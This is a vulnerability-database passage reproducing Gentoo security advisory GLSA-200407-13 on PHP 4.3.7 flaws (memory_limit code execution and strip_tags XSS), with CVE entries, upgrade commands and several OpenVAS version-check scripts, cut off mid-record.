ID GLSA-200407-13 Type gentoo Reporter Gentoo Foundation Modified 2004-07-15T00:00:00
Description
Background
PHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI.
Description
Several security vulnerabilities were found and fixed in version 4.3.8 of PHP. The strip_tags() function, used to sanitize user input, could in certain cases allow tags containing \0 characters (CAN-2004-0595). When memory_limit is used, PHP might unsafely interrupt other functions (CAN-2004-0594). The ftok and itpc functions were missing safe_mode checks. It was possible to bypass open_basedir restrictions using MySQL's LOAD DATA LOCAL function. Furthermore, the IMAP extension was incorrectly allocating memory and alloca() calls were replaced with emalloc() for better stack protection.
Impact
Successfully exploited, the memory_limit problem could allow remote excution of arbitrary code. By exploiting the strip_tags vulnerability, it is possible to pass HTML code that would be considered as valid tags by the Microsoft Internet Explorer and Safari browsers. Using ftok, itpc or MySQL's LOAD DATA LOCAL, it is possible to bypass PHP configuration restrictions.
Workaround
There is no known workaround that would solve all these problems. All users are encouraged to upgrade to the latest available versions.
Resolution
All PHP, mod_php and php-cgi users should upgrade to the latest stable version:
{"published": "2004-07-15T00:00:00", "id": "GLSA-200407-13", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2016-09-06T19:47:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0595", "CVE-2004-0594"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231013650", "OPENVAS:53498", "OPENVAS:54620", "OPENVAS:53221", "OPENVAS:53923", "OPENVAS:13650", "OPENVAS:136141256231053923", "OPENVAS:835148", "OPENVAS:1361412562310835148", "OPENVAS:52371"]}, {"type": "nessus", "idList": ["FEDORA_2004-222.NASL", "PHP_STRIP_TAGS_MEMORY_LIMIT_VULN.NASL", "DEBIAN_DSA-531.NASL", "FEDORA_2004-223.NASL", "DEBIAN_DSA-669.NASL", "MANDRAKE_MDKSA-2004-068.NASL", "GENTOO_GLSA-200407-13.NASL", "SLACKWARE_SSA_2004-202-01.NASL", "REDHAT-RHSA-2004-395.NASL", "SUSE_SA_2004_021.NASL"]}, {"type": "slackware", "idList": ["SSA-2004-202-01"]}, {"type": "redhat", "idList": ["RHSA-2004:395", "RHSA-2004:392"]}, {"type": "debian", "idList": ["DEBIAN:DSA-531-1:B45B2", "DEBIAN:DSA-669-1:AFB85"]}, {"type": "suse", "idList": ["SUSE-SA:2004:021"]}, {"type": "exploitdb", "idList": ["EDB-ID:24280", "EDB-ID:660", "EDB-ID:43835"]}, {"type": "freebsd", "idList": ["EDF61C61-0F07-11D9-8393-000103CCF9D6", "DD7AA4F1-102F-11D9-8A8A-000C41E2CDAD"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6483", "SECURITYVULNS:DOC:11592", "SECURITYVULNS:DOC:6484", "SECURITYVULNS:DOC:8636"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:44191"]}, {"type": "osvdb", "idList": ["OSVDB:7871", "OSVDB:7870"]}, {"type": "canvas", "idList": ["PHP_LIMIT"]}], "modified": "2016-09-06T19:47:03"}, "vulnersScore": 8.1}, "hash": "7d21437cfd4881b59a63b398693d4ca78774aa7529beb909aadfed8103d16400", "description": "### Background\n\nPHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI. \n\n### Description\n\nSeveral security vulnerabilities were found and fixed in version 4.3.8 of PHP. The strip_tags() function, used to sanitize user input, could in certain cases allow tags containing \\0 characters (CAN-2004-0595). When memory_limit is used, PHP might unsafely interrupt other functions (CAN-2004-0594). The ftok and itpc functions were missing safe_mode checks. It was possible to bypass open_basedir restrictions using MySQL's LOAD DATA LOCAL function. Furthermore, the IMAP extension was incorrectly allocating memory and alloca() calls were replaced with emalloc() for better stack protection. \n\n### Impact\n\nSuccessfully exploited, the memory_limit problem could allow remote excution of arbitrary code. By exploiting the strip_tags vulnerability, it is possible to pass HTML code that would be considered as valid tags by the Microsoft Internet Explorer and Safari browsers. Using ftok, itpc or MySQL's LOAD DATA LOCAL, it is possible to bypass PHP configuration restrictions. \n\n### Workaround\n\nThere is no known workaround that would solve all these problems. All users are encouraged to upgrade to the latest available versions. \n\n### Resolution\n\nAll PHP, mod_php and php-cgi users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=dev-php/php-4.3.8\"\n # emerge \">=dev-php/php-4.3.8\"\n \n # emerge -pv \">=dev-php/mod_php-4.3.8\"\n # emerge \">=dev-php/mod_php-4.3.8\"\n \n # emerge -pv \">=dev-php/php-cgi-4.3.8\"\n # emerge \">=dev-php/php-cgi-4.3.8\"", "type": "gentoo", "lastseen": "2016-09-06T19:47:03", "edition": 1, "title": "PHP: Multiple security vulnerabilities", "href": "https://security.gentoo.org/glsa/200407-13", "modified": "2004-07-15T00:00:00", "bulletinFamily": "unix", "viewCount": 4, "cvelist": ["CVE-2004-0595", "CVE-2004-0594"], "affectedPackage": [{"packageVersion": "4.3.7-r1", "packageName": "dev-php/php", "packageFilename": "UNKNOWN", "operator": "le", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}, {"packageVersion": "4.3.7-r1", "packageName": "dev-php/php-cgi", "packageFilename": "UNKNOWN", "operator": "le", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}, {"packageVersion": "4.3.7-r1", "packageName": "dev-php/mod_php", "packageFilename": "UNKNOWN", "operator": "le", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}], "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594", "http://security.e-matters.de/advisories/122004.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0595", "http://security.e-matters.de/advisories/112004.html", "https://bugs.gentoo.org/show_bug.cgi?id=56985"], "reporter": "Gentoo Foundation", "hashmap": [{"hash": "c31124004ef610e955ce1ce3eb7ac290", "key": "affectedPackage"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "59469a982f67574c701c8675ee6be64c", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "a7639fb019aa194acc71e4c8bab97444", "key": "description"}, {"hash": "c15e1d8591d7f5f1e419ac271443ec82", "key": "href"}, {"hash": "12e42c55a7e96b607cba60ac98f2a1db", "key": "modified"}, {"hash": "777d45bbbcdf50d49c42c70ad7acf5fe", "key": "objectVersion"}, {"hash": "12e42c55a7e96b607cba60ac98f2a1db", "key": "published"}, {"hash": "77117d33f97eff3ae9e4d3102c6981dd", "key": "references"}, {"hash": "ac1fd6b3deacaf22b54dd1934ae33181", "key": "reporter"}, {"hash": "5134f5c8c8b24d761155457b6cac4385", "key": "title"}, {"hash": "365d0fc7d6206ff26e2f2c2a78c91a94", "key": "type"}], "objectVersion": "1.2"}
{"cve": [{"lastseen": "2019-05-29T18:08:02", "bulletinFamily": "NVD", "description": "The strip_tags function in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, does not filter null (\\0) characters within tag names when restricting input to allowed tags, which allows dangerous tags to be processed by web browsers such as Internet Explorer and Safari, which ignore null characters and facilitate the exploitation of cross-site scripting (XSS) vulnerabilities.", "modified": "2018-10-30T16:25:00", "id": "CVE-2004-0595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0595", "published": "2004-07-27T04:00:00", "title": "CVE-2004-0595", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:02", "bulletinFamily": "NVD", "description": "The memory_limit functionality in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, under certain conditions such as when register_globals is enabled, allows remote attackers to execute arbitrary code by triggering a memory_limit abort during execution of the zend_hash_init function and overwriting a HashTable destructor pointer before the initialization of key data structures is complete.", "modified": "2018-10-30T16:25:00", "id": "CVE-2004-0594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0594", "published": "2004-07-27T04:00:00", "title": "CVE-2004-0594", "type": "cve", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "description": "The remote host is missing an update to php3\nannounced via advisory DSA 669-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53498", "id": "OPENVAS:53498", "title": "Debian Security Advisory DSA 669-1 (php3)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_669_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 669-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2004-0594\n\nThe memory_limit functionality allows remote attackers to execute\narbitrary code under certain circumstances.\n\nCVE-2004-0595\n\nThe strip_tags function does not filter null (\\0) characters\nwithin tag names when restricting input to allowed tags, which\nallows dangerous tags to be processed by some web browsers which\ncould lead to cross-site scripting (XSS) vulnerabilities.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.0.18-23.1woody2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 3.0.18-27.\n\nWe recommend that you upgrade your php3 packages.\";\ntag_summary = \"The remote host is missing an update to php3\nannounced via advisory DSA 669-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20669-1\";\n\nif(description)\n{\n script_id(53498);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 669-1 (php3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php3-doc\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-gd\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-imap\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-ldap\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-magick\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-mhash\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-mysql\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-snmp\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-cgi-xml\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-dev\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-gd\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-imap\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-ldap\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-magick\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-mhash\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-mysql\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-snmp\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php3-xml\", ver:\"3.0.18-23.1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:31:59", "bulletinFamily": "scanner", "description": "The remote host is running a version of PHP 4.3 which is older or equal to 4.3.7.\n\n There is a bug in the remote version of this software which may\n allow an attacker to execute arbitrary code on the remote host if the option\n memory_limit is set. Another bug in the function strip_tags() may allow\n an attacker to bypass content-restrictions when submitting data and may\n lead to cross-site-scripting issues.", "modified": "2019-04-24T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231013650", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231013650", "title": "php < 4.3.8", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# Description: php < 4.3.8\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.13650\");\n script_version(\"2019-04-24T07:26:10+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-24 07:26:10 +0000 (Wed, 24 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(10724, 10725);\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"OSVDB\", value:\"7870\");\n script_xref(name:\"OSVDB\", value:\"7871\");\n script_name(\"php < 4.3.8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"PHP/banner\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP 4.3.8\");\n script_tag(name:\"summary\", value:\"The remote host is running a version of PHP 4.3 which is older or equal to 4.3.7.\n\n There is a bug in the remote version of this software which may\n allow an attacker to execute arbitrary code on the remote host if the option\n memory_limit is set. Another bug in the function strip_tags() may allow\n an attacker to bypass content-restrictions when submitting data and may\n lead to cross-site-scripting issues.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\nphp = get_http_banner(port:port);\nif(!php || \"PHP\" >!< php)\n exit(0);\n\nif(ereg(pattern:\"PHP/4\\.3\\.[0-7][^0-9]\", string:php)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200407-13.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54620", "id": "OPENVAS:54620", "title": "Gentoo Security Advisory GLSA 200407-13 (PHP)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple security vulnerabilities, potentially allowing remote code\nexecution, were found and fixed in PHP.\";\ntag_solution = \"All PHP, mod_php and php-cgi users should upgrade to the latest stable\nversion:\n\n # emerge sync\n\n # emerge -pv '>=dev-php/php-4.3.8'\n # emerge '>=dev-php/php-4.3.8'\n\n # emerge -pv '>=dev-php/mod_php-4.3.8'\n # emerge '>=dev-php/mod_php-4.3.8'\n\n # emerge -pv '>=dev-php/php-cgi-4.3.8'\n # emerge '>=dev-php/php-cgi-4.3.8'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200407-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=56985\nhttp://security.e-matters.de/advisories/112004.html\nhttp://security.e-matters.de/advisories/122004.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200407-13.\";\n\n \n\nif(description)\n{\n script_id(54620);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200407-13 (PHP)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-php/php\", unaffected: make_list(\"ge 4.3.8\"), vulnerable: make_list(\"le 4.3.7-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/mod_php\", unaffected: make_list(\"ge 4.3.8\"), vulnerable: make_list(\"le 4.3.7-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"dev-php/php-cgi\", unaffected: make_list(\"ge 4.3.8\"), vulnerable: make_list(\"le 4.3.7-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:25", "bulletinFamily": "scanner", "description": "The remote host is missing an update to php4\nannounced via advisory DSA 531-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53221", "id": "OPENVAS:53221", "title": "Debian Security Advisory DSA 531-1 (php4)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_531_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 531-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities were discovered in php4:\n\n- CVE-2004-0594 - The memory_limit functionality in PHP 4.x up to\n4.3.7, and 5.x up to 5.0.0RC3, under certain conditions such as\nwhen register_globals is enabled, allows remote attackers to\nexecute arbitrary code by triggering a memory_limit abort during\nexecution of the zend_hash_init function and overwriting a\nHashTable destructor pointer before the initialization of key data\nstructures is complete.\n\n- CVE-2004-0595 - The strip_tags function in PHP 4.x up to 4.3.7, and\n5.x up to 5.0.0RC3, does not filter null (\\0) characters within tag\nnames when restricting input to allowed tags, which allows\ndangerous tags to be processed by web browsers such as Internet\nExplorer and Safari, which ignore null characters and facilitate\nthe exploitation of cross-site scripting (XSS) vulnerabilities.\n\nFor the current stable distribution (woody), these problems have been\nfixed in version 4.1.2-7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.3.8-1.\n\nWe recommend that you update your php4 package.\";\ntag_summary = \"The remote host is missing an update to php4\nannounced via advisory DSA 531-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20531-1\";\n\nif(description)\n{\n script_id(53221);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 531-1 (php4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"caudium-php4\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.1.2-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:55", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-202-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53923", "id": "OPENVAS:53923", "title": "Slackware Advisory SSA:2004-202-01 PHP", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_202_01.nasl 6598 2017-07-07 09:36:44Z cfischer 